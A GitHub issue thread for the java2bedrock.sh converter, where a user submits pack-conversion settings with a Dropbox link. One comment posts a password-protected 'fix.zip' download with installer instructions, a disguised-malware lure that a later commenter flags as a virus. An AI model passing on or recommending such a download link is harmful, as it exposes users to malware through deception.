### ISSUE TITLE
merge

### ISSUE THREAD

**Issue by Quoats** [Kas-tle/java2bedrock.sh#33490]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/5d53ygonvr86vups5fzia/merged.zip?rlkey=0yjqebc8ja68j3q226bwes5pn&st=b9yr2vrb&dl=1

### Default Assets Version

None

### Block Material

alpha_test

### Attachable Material

entity_emissive_alpha_one_sided

### Archive Scratch Files

true

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Don't download this file. This is a computer virus.
